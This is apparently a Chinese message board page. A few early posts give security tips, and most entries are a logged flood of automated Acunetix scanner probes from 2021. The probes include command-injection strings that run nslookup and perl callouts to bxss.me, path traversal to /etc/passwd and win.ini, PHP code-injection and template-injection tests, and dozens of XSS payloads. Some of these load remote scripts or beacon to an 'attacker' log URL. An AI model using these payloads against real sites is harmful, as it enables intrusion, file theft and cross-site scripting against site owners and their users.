mysql注入点当database函数不行的时候用这个技巧:
IP为45.76.162.*的童鞋 >>> Fucked at:2017-08-09 13:22:02 PM
nginx指定某目录可被浏览 如:www.lshack.cn/zidian location /zidian { autoindex on; autoindex_exact_size off; autoindex_localtime on; }IP为112.25.154.*的童鞋 >>> Fucked at:2017-08-10 13:51:44 PM
Acunetix test sites: - testphp.vulnweb.com - testasp.vulnweb.comIP为112.25.154.*的童鞋 >>> Fucked at:2017-09-01 17:37:05 PM
- testaspnet.vulnweb.com - testhtml5.vulnweb.comIP为112.25.154.*的童鞋 >>> Fucked at:2017-09-01 17:37:18 PM
IP为60.169.130.*的童鞋 >>> Fucked at:2017-12-17 20:48:00 PM
;IP为60.169.130.*的童鞋 >>> Fucked at:2017-12-17 20:48:04 PM
1bYxXBxcOIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:07 AM
response.write|9192353*9502141|IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
echo udyuet$||\\ tmkqbd\\nz^xyu||a #\' &echo udyuet$||\\ tmkqbd\\nz^xyu||a #|\" &eIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
\'+response.write|9192353*9502141|+\'IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
\"+response.write|9192353*9502141|+\"IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
fxxVdbzQIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
../../../../../../../../../../../../../../etc/passwdIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
&echo tbbrvn$||\\ yeghue\\nz^xyu||a #\' &echo tbbrvn$||\\ yeghue\\nz^xyu||a #|\" &IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
|echo bmlpbg$||\\ ckvhkb\\nz^xyu||a #\' |echo bmlpbg$||\\ ckvhkb\\nz^xyu||a #|\" |IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
|nslookup hitllvzwkwamnda4f3.bxss.me||perl -e \"gethostbyname|\'hitllvzwkwamnda4f3IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
$|nslookup hitrpucivbcjh4ef93.bxss.me||perl -e \"gethostbyname|\'hitrpucivbcjh4ef9IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
../../../../../../../../../../../../../../windows/win.iniIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
../IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
./IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
<esi:include src=\"bxss.me/rpb.png\"/>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
12345\'\"\\\'\\\"|;|]*\0{ <\0>\'\'💡IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
${9999957+10000153}IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpgIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
&|nslookup hitxbmfavvbwwbd98e.bxss.me||perl -e \"gethostbyname|\'hitxbmfavvbwwbd98IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
&n906196=v938416IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
||nslookup hitberlssyebx3e0fd.bxss.me||perl -e \"gethostbyname|\'hitberlssyebx3e0fIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:08 AM
|IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
`|nslookup hitmewtqqkznf1f70a.bxss.me||perl -e \"gethostbyname|\'hitmewtqqkznf1f70IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
!|||&&!|*|*|IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
;|nslookup hitrvnulahoahc3401.bxss.me||perl -e \"gethostbyname|\'hitrvnulahoahc340IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
^|#$!@#$||||||******IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\'.gethostbyname|lc|\'hitjf\'.\'grwyofcfc2d0d.bxss.me.\'||.\'A\'.chr|67|.chr|hex|\IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\'\"||IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\".gethostbyname|lc|\"hitvb\".\"rsfyryhp56161.bxss.me.\"||.\"A\".chr|67|.chr|hex|\IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
1some_inexistent_file_with_long_name\0.jpgIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
;assert|base64_decode|\'cHJpbnQobWQ1KDMxMzM3KSk7\'||;IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
HttP://bxss.me/t/xss.html?%00IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
Http://bxss.me/t/fit.txtIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
bxss.me/t/xss.html?%00IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
bxss.me/t/fit.txt?.jpgIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\"+\"A\".concat|70-3|.concat|22*4|.concat|112|.concat|65|.concat|108|.concat|88|+|IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
bxss.meIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\'+\'A\'.concat|70-3|.concat|22*4|.concat|102|.concat|87|.concat|103|.concat|71|+|IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
index.phpIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
index.phpIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
/xfs.bxss.meIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
index.php/.IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\';print|md5|31337||;$a=\'IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\'\"IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\'\"||&%<acx><ScRiPt >yWEn|9549|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\";print|md5|31337||;$a=\"IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
<!--IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\'\"||&%<acx><ScRiPt >yWEn|9484|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
${@print|md5|31337||}IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
9787002IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
${@print|md5|31337||}\\IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\'.print|md5|31337||.\'IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 2:13:09 AM
\'\"||&%<acx><ScRiPt >di0U|9107|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:10 AM
\'\"||&%<acx><ScRiPt >di0U|9624|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:10 AM
9723798IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:10 AM
\'\"||&%<acx><ScRiPt >Ocus|9286|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:44 AM
\'\"||&%<acx><ScRiPt >Ocus|9537|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:44 AM
9613272IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:45 AM
acu7814<s1﹥s2ʺs3ʹuca7814IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:45 AM
acux2215z1z2abcxuca2215IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:46 AM
<%={{={@{#{${acx}}%>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:46 AM
<th:t=\"${acx}#foreachIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
1}}\"}}\'}}1%>\"%>\'%><%={{={@{#{${acx}}%>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
acx{{98991*97996}}xcaIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
acx[[${98991*97996}]]xcaIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
acx__${98991*97996}__::.xIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
\"acxzzzzzzzzbbbccccdddeeexca\".replace|\"z\",\"o\"|IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
<ScRiPt >Ocus|9412|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
<WNCJHE>DZWZV[!+!]</WNCJHE>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
<script>Ocus|9830|</script>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
<ScR<ScRiPt>IpT>Ocus|9534|</sCr<ScRiPt>IpT>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:47 AM
<ScRiPt >Ocus|9385|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9744></ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<\0ScRiPt >Ocus|9589|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<svg \0onload=Ocus|9422|;>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<isindex type=image src=1 onerror=Ocus|9665|>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<iframe src=\'data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<body onload=Ocus|9378|>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<img src=//xss.bxss.me/t/dot.gif onload=Ocus|9623|>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<img src=xyz OnErRor=Ocus|9216|>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
<img/src=\">\" onerror=alert|9463|>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
%E8%AF%B4%E7%82%B9%E4%BB%80%E4%B9%88%E5%90%A7%3C%53%63%52%69%50%74%20%3E%4F%63%75%IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:48 AM
\\u003CScRiPt\\Ocus|9711|\\u003C/sCripT\\u003EIP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:49 AM
<ScRiPt>Ocus|9364|</sCripT>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:49 AM
<img acu onmouseover=Ocus|99491| //>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:49 AM
<input autofocus onfocus=Ocus|9912|>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:49 AM
<a HrEF=xss.bxss.me></a>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:49 AM
<a HrEF=jaVaScRiPT:>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:49 AM
}body{acu:Expre/**/SSion|Ocus|9258||}IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:49 AM
XfPif <ScRiPt >Ocus|9261|</ScRiPt>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:50 AM
<WIEJFL>FOJJ5[!+!]</WIEJFL>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:50 AM
<ifRAme sRc=9772.com></IfRamE>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:50 AM
<aI3oggT x=9535>IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:50 AM
<img sRc=\'attacker-9257/log.php?IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:50 AM
<aHJe78i<IP为121.228.199.*的童鞋 >>> Fucked at:2021-10-23 6:52:50 AM